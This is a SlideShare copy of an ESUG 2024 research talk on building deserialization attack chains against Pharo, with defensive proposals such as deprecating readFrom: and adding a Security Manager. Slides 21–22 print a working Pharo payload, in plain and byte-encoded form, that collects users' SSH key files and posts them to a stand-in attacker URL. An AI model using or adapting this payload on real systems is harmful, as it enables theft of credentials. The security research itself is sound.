SlideShare a Scribd company logo

Attack chains construction: Towards detecting and preventing Pharo vulnerabilities

E
ESUG

The document discusses vulnerabilities in Pharo, specifically exploring the potential for deserialization attacks similar to those found in Java. It highlights the absence of reported CVEs for Pharo, leading to questions about its safety, and proposes that systematic checks and security measures are essential. The content also presents a method for stealing SSH keys through a crafted malicious payload, emphasizing the need for security considerations in Pharo's design.

Software
1 of 32
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Attack chains construction: ESUG 2024 Talks Imen Sayar, Steven Costiou, Cyril Ferlicot-Delbecque Wednesday, July 10, 2024 Towards detecting and preventing Pharo vulnerabilities
Example of real-world attack 2 Source: https://www.theguardian.com/technology/2016/nov/28/passengers-free-ride-san-francisco-muni-ransomeware
● CVE (Common Vulnerabilities and Exposures): ID + vulnerability description + patch (if any) + exploits + … ● Known databases for attacks/vulnerabilities description ○ OWASP (Open Web Application Security Project) ○ MITRE corporation ○ RedHat ○ NVD (National Vulnerabilities Database) of NIST Terminology 3
Example of CVE search 2818 CVEs on Java 148 CVEs on Java deserializ(s)ation 105 CVEs on Java injection 4 925 CVEs on Python 14211 CVEs on SQL injection …
What about CVE search for Pharo? - 0 CVEs on “Pharo” - 0 CVEs for “SmallTalk” 5 No detected or reported attacks in Pharo?
● There are no reported attacks in Pharo ○ does this mean that Pharo is safe? ■ if that’s the case, everything is fine :-) ■ if not, we need to know the potential attacks and to prevent them ● How do we know if Pharo is (really) safe? 6 So..
Our goal is to check if Pharo codes can be attacked write a PoC of attacks 7
Our goal is to check if Pharo codes can be attacked write a PoC of attacks Deserialization attacks! 8
● Serialization: transform an object into a sequence of bytes ● Deserialization: reconstruct the object from the data available in the serialized sequence Deserialization attacks 9 public class MyClass implements Serializable { int a; public MyClass (int a) { this.a = a; } public int m (..) {..} } 00000000 ac ed 00 05 73 72 00 07 4d 79 43 6c 61 73 73 ed |....sr..MyClass.| 00000010 ef 00 78 02 ca 82 96 02 00 01 49 00 01 61 78 70 |..x.......I..axp| 00000020 00 00 00 22 |..."| Instantiation MyClass mc = new MyClass(34) […] Serialization Deserialization 9
10 Deserialization attack in PayPal in 2015 Source: https://artsploit.blogspot.com/201 6/01/paypal-rce.html
??? Malicious file Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…]' Serialization 2 |users| users := (FileSystem disk root / ''Users''). (users entries collect:[:e| …] Victim side ??? Object class>>readFrom: maliciousString … ???? ??? Deserialization Legend payload gadget exploit 1 Attack action (steal sensitive data) 3 Deserialization attacks 101 11 Malicious code
Understanding deserialization attacks 12 * https://github.com/frohoff/ysoserial [1] Imen Sayar, Alexandre Bartel, Eric Bodden, and Yves Le Traon. “An in-depth study of java deserialization remote-code execution exploits and vulnerabilities”. ACM Trans. Softw. Eng. Methodol., 32(1) :25 :1–25 :45, 2023. ● Ysoserial* tool as a PoC for Java deserialization attacks ● We have studied 19 out of 47 attacks in Java described by ysoserial [1] ● We have extracted the call stacks of these attacks ● Our goal was to extract information from these attacks to reuse them in other languages
Jdk7 update 21 Commons Collections 3.1 Gadgets 13 Ysoserial deserialization attacks
Internal mechanisms in attacks 14 Reflection Native calls Vulnerable classes/methods
Attacks are not using new concepts. They are based on existing concepts as reflection, native calls, and late binding 15 Observation n° 1
The vulnerability is not a specific code fragment. It is a constellation of multiple method invocations combined into a so-called “Gadget Chain” 16 Observation n° 2
Now that we have understood how deserialization attacks happen in Java, we target the Pharo language and try to create an attack. But, what are the ingredients for that? 17 Objective
Malicious file Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…]’ Serialization ??? 1 Getting an Attack Recipe 18 Malicious code Malicious code that will generate malicious file
Malicious file Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…]’ Serialization ??? 1 Getting an Attack Recipe 19 Malicious code ??? ??? ??? … ??? ??? Legend payload gadget exploit - Vulnerable language version - methods to invoke Victim side
Malicious file Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…]’ Serialization ??? 1 Getting an Attack Recipe 20 Malicious code 2 ??? ??? ??? … ??? ??? Legend payload gadget exploit Victim side Attack action 3 Deserialization - send malicious file to the victim - deserialize the content of the malicious file
Payload for stealing SSH keys in Pharo 21 '|users| users := (FileSystem disk root / ''Users''). (users entries collect: [:e | [|userSSHDir stolenFiles| userSSHDir := e asFileReference /''.ssh''. stolenFiles := Dictionary new. userSSHDir entries do:[:file| stolenFiles at: file asFileReference path put: file asFileReference contents ]. stolenFiles ] onErrorDo: [:err| nil ]. ]). ZnClient new url: ''www.attackerUrl.com''; contents: stolenFiles; post' ' asByteArray printString. (1) capture the users path (2) collect from the users entries all the ssh files (3) create a dictionary to put stolen ssh files (4) put the content of each ssh file in the stolenFiles (5) send the stolen ssh files to the attacker website (6) transform the attack instructions into a ByteArray Malicious code
Encoded payload for stealing SSH keys 22 '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116 101 109 32 100 105 115 107 32 114 111 111 116 32 47 32 39 85 115 101 114 115 39 41 46 13 40 117 115 101 114 115 32 101 110 116 114 105 101 115 32 99 111 108 108 101 99 116 58 91 58 101 124 13 32 32 32 32 91 124 117 115 101 114 83 83 72 68 105 114 32 115 116 111 108 101 110 70 105 108 101 115 124 13 32 32 32 32 117 115 101 114 83 83 72 68 105 114 32 58 61 32 101 32 97 115 70 105 108 101 82 101 102 101 114 101 110 99 101 32 47 39 46 115 115 104 39 46 32 34 115 101 108 102 32 104 97 108 116 46 34 13 32 32 32 32 115 116 111 108 101 110 70 105 108 101 115 32 58 61 32 68 105 99 116 105 111 110 97 114 121 32 110 101 119 46 13 32 32 32 32 117 115 101 114 83 83 72 68 105 114 32 101 110 116 114 105 101 115 32 100 111 58 91 58 102 105 108 101 124 13 32 32 32 32 32 32 32 32 32 91 115 116 111 108 101 110 70 105 108 101 115 32 97 116 58 32 102 105 108 101 32 97 115 70 105 108 101 82 101 102 101 114 101 110 99 101 32 112 97 116 104 32 112 117 116 58 32 102 105 108 101 32 97 115 70 105 108 101 82 101 102 101 114 101 110 99 101 32 99 111 110 116 101 110 116 115 32 93 111 110 69 114 114 111 114 68 111 58 32 91 58 101 114 114 124 32 110 105 108 32 93 93 46 13 32 32 32 32 115 116 111 108 101 110 70 105 108 101 115 13 32 32 32 32 93 32 111 110 69 114 114 111 114 68 111 58 32 91 58 101 114 114 124 32 110 105 108 32 93 46 13 93 41 32 105 110 115 112 101 99 116 46 32 13 13 90 110 67 108 105 101 110 116 32 110 101 119 13 9 9 9 117 114 108 58 32 39 117 114 108 46 99 111 109 39 59 13 9 9 9 99 111 110 116 101 110 116 115 58 32 115 116 111 108 101 110 70 105 108 101 115 59 13 9 9 9 112 111 115 116]' ⇒ This malicious bytestream is unreadable by humans and will be sent to the victim to deserialize it using the readFrom: method
The readFrom: method 23 ● The victim application will deserialize the maliciousString using the Object class >> readFrom: method ● The readFrom: method invokes the evaluate: method ○ both of them are considered as gadgets
OCReceiverDoItSemanticScope(OCDoItSemanticScope)>>evaluateDoIt: Malicious file maliciousString Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…] Serialization 2 |users| users := (FileSystem disk root / ''Users''). (users entries collect:[:e| …] Victim side OpalCompiler>>evaluate: maliciousString Object class>>readFrom: maliciousString … evaluate ZnClient>>post Deserialization Legend payload gadget exploit 1 Attack action (steal and send SSH keys to www.attackerUrl.com) 3 Pharo attack conduct 24 Malicious code
Attack chains construction: Towards detecting and preventing Pharo vulnerabilities
What’s next? ● Shall we deprecate then remove Object class>>readFrom:? ● No Security Manager in Pharo for preventing attacks ○ introduce natively this concept in Pharo? ● One of the main problems in the attacks is that the victim application contains openings to the outside (eg., reading from external file, queryable database) ○ why not detecting these openings and control them? 26
Conclusion ● Vulnerabilities still exist in Object Oriented languages ● Pharo attack chains construction for 3 attacks ● It is relevant to consider and implement security checks when coding in Pharo 27
OCReceiverDoItSemanticScope(OCDoItSemanticScope)>>evaluateDoIt: Malicious file maliciousString Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…] Serialization 2 |users| users := (FileSystem disk root / ''Users''). (users entries collect:[:e| …] Victim side OpalCompiler>>evaluate: textStringOrStream Object class>>readFrom: maliciousString … evaluate ZnClient>>post Deserialization 1 Attack action (steal and send SSH keys) 3 Malicious code Thank you!
29
30 Backup slides
31 SecurityManager secuManager = new SecurityManager(); System.setSecurityManager(secuManager);
Malicious file maliciousString Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…] Serialization 2 |users| users := (FileSystem disk root / ''Users''). (users entries collect:[:e| …] Victim side OpalCompiler>>evaluate: textStringOrStream Object class>>readFrom: maliciousString Deserialization Legend payload gadget exploit 1 Pharo with a Security Manager 32 Malicious code Security Manager

More Related Content

Similar to Attack chains construction: Towards detecting and preventing Pharo vulnerabilities (20)

PDF
[Wroclaw #7] Why So Serial?
OWASP
 
PDF
Automated Discovery of Deserialization Gadget Chains
Priyanka Aash
 
PPTX
Auscert 2022 - log4shell and history of Java deserialisation RCE
David Jorm
 
PDF
2011-03 Developing Windows Exploits
Raleigh ISSA
 
PPTX
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat Security Conference
 
PPTX
(De)serial Killers - BSides Las Vegas & AppSec IL 2018
Dor Tumarkin
 
PDF
(De)serial Killers - BSides Las Vegas & AppSec IL 2018
Checkmarx
 
PDF
Automated Discovery of Deserialization Gadget Chains
Priyanka Aash
 
PDF
Automated Discovery of Deserialization Gadget Chains
Priyanka Aash
 
PDF
BERserk: New RSA Signature Forgery Attack
Alex Matrosov
 
PDF
Marat-Slides
Marat Vyshegorodtsev
 
PDF
3
Marat Vyshegorodtsev
 
PPTX
Ch15,secu..
eman37aseb
 
PDF
Sourcefire Vulnerability Research Team Labs
losalamos
 
PDF
Exploitation and State Machines
Michael Scovetta
 
PDF
Unsafe Deserialization Attacks In Java and A New Approach To Protect The JVM ...
Apostolos Giannakidis
 
PPTX
Java/Scala Lab 2016. Владимир Гарбуз: Написание безопасного кода на Java.
GeeksLab Odessa
 
PDF
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
NETWAYS
 
PDF
Boutin reversing banking trojan. an in-depth look into gataka
DefconRussia
 
PDF
Reversing banking trojan: an in-depth look into Gataka
jiboutin
 
[Wroclaw #7] Why So Serial?
OWASP
 
Automated Discovery of Deserialization Gadget Chains
Priyanka Aash
 
Auscert 2022 - log4shell and history of Java deserialisation RCE
David Jorm
 
2011-03 Developing Windows Exploits
Raleigh ISSA
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat Security Conference
 
(De)serial Killers - BSides Las Vegas & AppSec IL 2018
Dor Tumarkin
 
(De)serial Killers - BSides Las Vegas & AppSec IL 2018
Checkmarx
 
Automated Discovery of Deserialization Gadget Chains
Priyanka Aash
 
Automated Discovery of Deserialization Gadget Chains
Priyanka Aash
 
BERserk: New RSA Signature Forgery Attack
Alex Matrosov
 
Marat-Slides
Marat Vyshegorodtsev
 
3
Marat Vyshegorodtsev
 
Ch15,secu..
eman37aseb
 
Sourcefire Vulnerability Research Team Labs
losalamos
 
Exploitation and State Machines
Michael Scovetta
 
Unsafe Deserialization Attacks In Java and A New Approach To Protect The JVM ...
Apostolos Giannakidis
 
Java/Scala Lab 2016. Владимир Гарбуз: Написание безопасного кода на Java.
GeeksLab Odessa
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
NETWAYS
 
Boutin reversing banking trojan. an in-depth look into gataka
DefconRussia
 
Reversing banking trojan: an in-depth look into Gataka
jiboutin
 

More from ESUG (20)

PDF
Soil: Tutorial and Q&A (ESUG 2025, Gdansk)
ESUG
 
PDF
Rhizome - Distribution in Soil (ESUG 2025)
ESUG
 
PDF
Al assistants in Glamorous Toolkit (ESUG 2025)
ESUG
 
PDF
VM & JIT Profiling in VAST (ESUG 2025, Gdansk)
ESUG
 
PDF
Fighting the Branch Predictor (ESUG 2025)
ESUG
 
PDF
GIS in Pharo PharoOWS & GeoView (ESUG 2025)
ESUG
 
PDF
Working with thousands of images (ESUG 2025)
ESUG
 
PDF
Advancing Modern Web Application Architecture in Seaside
ESUG
 
PDF
Smalltalk for the Web & Beyond (ESUG 2025)
ESUG
 
PDF
Instantiations Company Update (ESUG 2025)
ESUG
 
PDF
Memory Management In Linux and GemStone (ESUG 2025)
ESUG
 
PDF
METRICS OVER MAYHEM | MAKE COMPLEXITY VISIBLE - A SIMPLE APPROACH TO ANALYSE ...
ESUG
 
PDF
Behaviour-Driven Development with Hera (ESUG2025)
ESUG
 
PDF
Meta-compilation of Baseline JIT Compilers with Druid
ESUG
 
PDF
Seamless OAuth2.0 and OpenID Connect in VAST
ESUG
 
PDF
Toplo, Bloc & Spec - A Graphic Layer for the Present and Future
ESUG
 
PDF
How to write an App with Spec? ESUG 2025
ESUG
 
PDF
Selective Pretenuring and about allocation sites
ESUG
 
PDF
ESUG 2025: Pharo 13 and Beyond (Stephane Ducasse)
ESUG
 
PDF
ESUG 2025: Welcome to ESUG 2025 in Gdansk!
ESUG
 
Soil: Tutorial and Q&A (ESUG 2025, Gdansk)
ESUG
 
Rhizome - Distribution in Soil (ESUG 2025)
ESUG
 
Al assistants in Glamorous Toolkit (ESUG 2025)
ESUG
 
VM & JIT Profiling in VAST (ESUG 2025, Gdansk)
ESUG
 
Fighting the Branch Predictor (ESUG 2025)
ESUG
 
GIS in Pharo PharoOWS & GeoView (ESUG 2025)
ESUG
 
Working with thousands of images (ESUG 2025)
ESUG
 
Advancing Modern Web Application Architecture in Seaside
ESUG
 
Smalltalk for the Web & Beyond (ESUG 2025)
ESUG
 
Instantiations Company Update (ESUG 2025)
ESUG
 
Memory Management In Linux and GemStone (ESUG 2025)
ESUG
 
METRICS OVER MAYHEM | MAKE COMPLEXITY VISIBLE - A SIMPLE APPROACH TO ANALYSE ...
ESUG
 
Behaviour-Driven Development with Hera (ESUG2025)
ESUG
 
Meta-compilation of Baseline JIT Compilers with Druid
ESUG
 
Seamless OAuth2.0 and OpenID Connect in VAST
ESUG
 
Toplo, Bloc & Spec - A Graphic Layer for the Present and Future
ESUG
 
How to write an App with Spec? ESUG 2025
ESUG
 
Selective Pretenuring and about allocation sites
ESUG
 
ESUG 2025: Pharo 13 and Beyond (Stephane Ducasse)
ESUG
 
ESUG 2025: Welcome to ESUG 2025 in Gdansk!
ESUG
 
Ad

Recently uploaded (20)

PPTX
iaas vs paas vs saas :choosing your cloud strategy
CloudlayaTechnology
 
PPTX
Transforming Insights: How Generative AI is Revolutionizing Data Analytics
LetsAI Solutions
 
PPTX
AEM User Group: India Chapter Kickoff Meeting
jennaf3
 
PDF
Meet in the Middle: Solving the Low-Latency Challenge for Agentic AI
Alluxio, Inc.
 
PDF
Generic or Specific? Making sensible software design decisions
Bert Jan Schrijver
 
PDF
Dipole Tech Innovations – Global IT Solutions for Business Growth
dipoletechi3
 
PDF
Best Web development company in india 2025
Greenusys
 
PDF
Everything you need to know about pricing & licensing Microsoft 365 Copilot f...
Q-Advise
 
PDF
SciPy 2025 - Packaging a Scientific Python Project
Henry Schreiner
 
PDF
AI Prompts Cheat Code prompt engineering
Avijit Kumar Roy
 
PDF
Technical-Careers-Roadmap-in-Software-Market.pdf
Hussein Ali
 
PPTX
Library_Management_System_PPT111111.pptx
nmtnissancrm
 
PPTX
Foundations of Marketo Engage - Powering Campaigns with Marketo Personalization
bbedford2
 
PDF
Download Canva Pro 2025 PC Crack Full Latest Version
bashirkhan333g
 
PDF
Latest Capcut Pro 5.9.0 Crack Version For PC {Fully 2025
utfefguu
 
PDF
IObit Driver Booster Pro 12.4.0.585 Crack Free Download
henryc1122g
 
PDF
Salesforce Experience Cloud Consultant.pdf
VALiNTRY360
 
PPTX
UI5con_2025_Accessibility_Ever_Evolving_
gerganakremenska1
 
PDF
AI + DevOps = Smart Automation with devseccops.ai.pdf
Devseccops.ai
 
PPTX
Get Started with Maestro: Agent, Robot, and Human in Action – Session 5 of 5
klpathrudu
 
iaas vs paas vs saas :choosing your cloud strategy
CloudlayaTechnology
 
Transforming Insights: How Generative AI is Revolutionizing Data Analytics
LetsAI Solutions
 
AEM User Group: India Chapter Kickoff Meeting
jennaf3
 
Meet in the Middle: Solving the Low-Latency Challenge for Agentic AI
Alluxio, Inc.
 
Generic or Specific? Making sensible software design decisions
Bert Jan Schrijver
 
Dipole Tech Innovations – Global IT Solutions for Business Growth
dipoletechi3
 
Best Web development company in india 2025
Greenusys
 
Everything you need to know about pricing & licensing Microsoft 365 Copilot f...
Q-Advise
 
SciPy 2025 - Packaging a Scientific Python Project
Henry Schreiner
 
AI Prompts Cheat Code prompt engineering
Avijit Kumar Roy
 
Technical-Careers-Roadmap-in-Software-Market.pdf
Hussein Ali
 
Library_Management_System_PPT111111.pptx
nmtnissancrm
 
Foundations of Marketo Engage - Powering Campaigns with Marketo Personalization
bbedford2
 
Download Canva Pro 2025 PC Crack Full Latest Version
bashirkhan333g
 
Latest Capcut Pro 5.9.0 Crack Version For PC {Fully 2025
utfefguu
 
IObit Driver Booster Pro 12.4.0.585 Crack Free Download
henryc1122g
 
Salesforce Experience Cloud Consultant.pdf
VALiNTRY360
 
UI5con_2025_Accessibility_Ever_Evolving_
gerganakremenska1
 
AI + DevOps = Smart Automation with devseccops.ai.pdf
Devseccops.ai
 
Get Started with Maestro: Agent, Robot, and Human in Action – Session 5 of 5
klpathrudu
 
Ad

Attack chains construction: Towards detecting and preventing Pharo vulnerabilities

  • 1. Attack chains construction: ESUG 2024 Talks Imen Sayar, Steven Costiou, Cyril Ferlicot-Delbecque Wednesday, July 10, 2024 Towards detecting and preventing Pharo vulnerabilities
  • 2. Example of real-world attack 2 Source: https://www.theguardian.com/technology/2016/nov/28/passengers-free-ride-san-francisco-muni-ransomeware
  • 3. ● CVE (Common Vulnerabilities and Exposures): ID + vulnerability description + patch (if any) + exploits + … ● Known databases for attacks/vulnerabilities description ○ OWASP (Open Web Application Security Project) ○ MITRE corporation ○ RedHat ○ NVD (National Vulnerabilities Database) of NIST Terminology 3
  • 4. Example of CVE search 2818 CVEs on Java 148 CVEs on Java deserializ(s)ation 105 CVEs on Java injection 4 925 CVEs on Python 14211 CVEs on SQL injection …
  • 5. What about CVE search for Pharo? - 0 CVEs on “Pharo” - 0 CVEs for “SmallTalk” 5 No detected or reported attacks in Pharo?
  • 6. ● There are no reported attacks in Pharo ○ does this mean that Pharo is safe? ■ if that’s the case, everything is fine :-) ■ if not, we need to know the potential attacks and to prevent them ● How do we know if Pharo is (really) safe? 6 So..
  • 7. Our goal is to check if Pharo codes can be attacked write a PoC of attacks 7
  • 8. Our goal is to check if Pharo codes can be attacked write a PoC of attacks Deserialization attacks! 8
  • 9. ● Serialization: transform an object into a sequence of bytes ● Deserialization: reconstruct the object from the data available in the serialized sequence Deserialization attacks 9 public class MyClass implements Serializable { int a; public MyClass (int a) { this.a = a; } public int m (..) {..} } 00000000 ac ed 00 05 73 72 00 07 4d 79 43 6c 61 73 73 ed |....sr..MyClass.| 00000010 ef 00 78 02 ca 82 96 02 00 01 49 00 01 61 78 70 |..x.......I..axp| 00000020 00 00 00 22 |..."| Instantiation MyClass mc = new MyClass(34) […] Serialization Deserialization 9
  • 10. 10 Deserialization attack in PayPal in 2015 Source: https://artsploit.blogspot.com/201 6/01/paypal-rce.html
  • 11. ??? Malicious file Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…]' Serialization 2 |users| users := (FileSystem disk root / ''Users''). (users entries collect:[:e| …] Victim side ??? Object class>>readFrom: maliciousString … ???? ??? Deserialization Legend payload gadget exploit 1 Attack action (steal sensitive data) 3 Deserialization attacks 101 11 Malicious code
  • 12. Understanding deserialization attacks 12 * https://github.com/frohoff/ysoserial [1] Imen Sayar, Alexandre Bartel, Eric Bodden, and Yves Le Traon. “An in-depth study of java deserialization remote-code execution exploits and vulnerabilities”. ACM Trans. Softw. Eng. Methodol., 32(1) :25 :1–25 :45, 2023. ● Ysoserial* tool as a PoC for Java deserialization attacks ● We have studied 19 out of 47 attacks in Java described by ysoserial [1] ● We have extracted the call stacks of these attacks ● Our goal was to extract information from these attacks to reuse them in other languages
  • 13. Jdk7 update 21 Commons Collections 3.1 Gadgets 13 Ysoserial deserialization attacks
  • 14. Internal mechanisms in attacks 14 Reflection Native calls Vulnerable classes/methods
  • 15. Attacks are not using new concepts. They are based on existing concepts as reflection, native calls, and late binding 15 Observation n° 1
  • 16. The vulnerability is not a specific code fragment. It is a constellation of multiple method invocations combined into a so-called “Gadget Chain” 16 Observation n° 2
  • 17. Now that we have understood how deserialization attacks happen in Java, we target the Pharo language and try to create an attack. But, what are the ingredients for that? 17 Objective
  • 18. Malicious file Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…]’ Serialization ??? 1 Getting an Attack Recipe 18 Malicious code Malicious code that will generate malicious file
  • 19. Malicious file Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…]’ Serialization ??? 1 Getting an Attack Recipe 19 Malicious code ??? ??? ??? … ??? ??? Legend payload gadget exploit - Vulnerable language version - methods to invoke Victim side
  • 20. Malicious file Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…]’ Serialization ??? 1 Getting an Attack Recipe 20 Malicious code 2 ??? ??? ??? … ??? ??? Legend payload gadget exploit Victim side Attack action 3 Deserialization - send malicious file to the victim - deserialize the content of the malicious file
  • 21. Payload for stealing SSH keys in Pharo 21 '|users| users := (FileSystem disk root / ''Users''). (users entries collect: [:e | [|userSSHDir stolenFiles| userSSHDir := e asFileReference /''.ssh''. stolenFiles := Dictionary new. userSSHDir entries do:[:file| stolenFiles at: file asFileReference path put: file asFileReference contents ]. stolenFiles ] onErrorDo: [:err| nil ]. ]). ZnClient new url: ''www.attackerUrl.com''; contents: stolenFiles; post' ' asByteArray printString. (1) capture the users path (2) collect from the users entries all the ssh files (3) create a dictionary to put stolen ssh files (4) put the content of each ssh file in the stolenFiles (5) send the stolen ssh files to the attacker website (6) transform the attack instructions into a ByteArray Malicious code
  • 22. Encoded payload for stealing SSH keys 22 '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116 101 109 32 100 105 115 107 32 114 111 111 116 32 47 32 39 85 115 101 114 115 39 41 46 13 40 117 115 101 114 115 32 101 110 116 114 105 101 115 32 99 111 108 108 101 99 116 58 91 58 101 124 13 32 32 32 32 91 124 117 115 101 114 83 83 72 68 105 114 32 115 116 111 108 101 110 70 105 108 101 115 124 13 32 32 32 32 117 115 101 114 83 83 72 68 105 114 32 58 61 32 101 32 97 115 70 105 108 101 82 101 102 101 114 101 110 99 101 32 47 39 46 115 115 104 39 46 32 34 115 101 108 102 32 104 97 108 116 46 34 13 32 32 32 32 115 116 111 108 101 110 70 105 108 101 115 32 58 61 32 68 105 99 116 105 111 110 97 114 121 32 110 101 119 46 13 32 32 32 32 117 115 101 114 83 83 72 68 105 114 32 101 110 116 114 105 101 115 32 100 111 58 91 58 102 105 108 101 124 13 32 32 32 32 32 32 32 32 32 91 115 116 111 108 101 110 70 105 108 101 115 32 97 116 58 32 102 105 108 101 32 97 115 70 105 108 101 82 101 102 101 114 101 110 99 101 32 112 97 116 104 32 112 117 116 58 32 102 105 108 101 32 97 115 70 105 108 101 82 101 102 101 114 101 110 99 101 32 99 111 110 116 101 110 116 115 32 93 111 110 69 114 114 111 114 68 111 58 32 91 58 101 114 114 124 32 110 105 108 32 93 93 46 13 32 32 32 32 115 116 111 108 101 110 70 105 108 101 115 13 32 32 32 32 93 32 111 110 69 114 114 111 114 68 111 58 32 91 58 101 114 114 124 32 110 105 108 32 93 46 13 93 41 32 105 110 115 112 101 99 116 46 32 13 13 90 110 67 108 105 101 110 116 32 110 101 119 13 9 9 9 117 114 108 58 32 39 117 114 108 46 99 111 109 39 59 13 9 9 9 99 111 110 116 101 110 116 115 58 32 115 116 111 108 101 110 70 105 108 101 115 59 13 9 9 9 112 111 115 116]' ⇒ This malicious bytestream is unreadable by humans and will be sent to the victim to deserialize it using the readFrom: method
  • 23. The readFrom: method 23 ● The victim application will deserialize the maliciousString using the Object class >> readFrom: method ● The readFrom: method invokes the evaluate: method ○ both of them are considered as gadgets
  • 24. OCReceiverDoItSemanticScope(OCDoItSemanticScope)>>evaluateDoIt: Malicious file maliciousString Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…] Serialization 2 |users| users := (FileSystem disk root / ''Users''). (users entries collect:[:e| …] Victim side OpalCompiler>>evaluate: maliciousString Object class>>readFrom: maliciousString … evaluate ZnClient>>post Deserialization Legend payload gadget exploit 1 Attack action (steal and send SSH keys to www.attackerUrl.com) 3 Pharo attack conduct 24 Malicious code
  • 26. What’s next? ● Shall we deprecate then remove Object class>>readFrom:? ● No Security Manager in Pharo for preventing attacks ○ introduce natively this concept in Pharo? ● One of the main problems in the attacks is that the victim application contains openings to the outside (eg., reading from external file, queryable database) ○ why not detecting these openings and control them? 26
  • 27. Conclusion ● Vulnerabilities still exist in Object Oriented languages ● Pharo attack chains construction for 3 attacks ● It is relevant to consider and implement security checks when coding in Pharo 27
  • 28. OCReceiverDoItSemanticScope(OCDoItSemanticScope)>>evaluateDoIt: Malicious file maliciousString Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…] Serialization 2 |users| users := (FileSystem disk root / ''Users''). (users entries collect:[:e| …] Victim side OpalCompiler>>evaluate: textStringOrStream Object class>>readFrom: maliciousString … evaluate ZnClient>>post Deserialization 1 Attack action (steal and send SSH keys) 3 Malicious code Thank you!
  • 29. 29
  • 31. 31 SecurityManager secuManager = new SecurityManager(); System.setSecurityManager(secuManager);
  • 32. Malicious file maliciousString Attacker side '#[124 117 115 101 114 115 124 13 117 115 101 114 115 32 58 61 32 40 70 105 108 101 83 121 115 116…] Serialization 2 |users| users := (FileSystem disk root / ''Users''). (users entries collect:[:e| …] Victim side OpalCompiler>>evaluate: textStringOrStream Object class>>readFrom: maliciousString Deserialization Legend payload gadget exploit 1 Pharo with a Security Manager 32 Malicious code Security Manager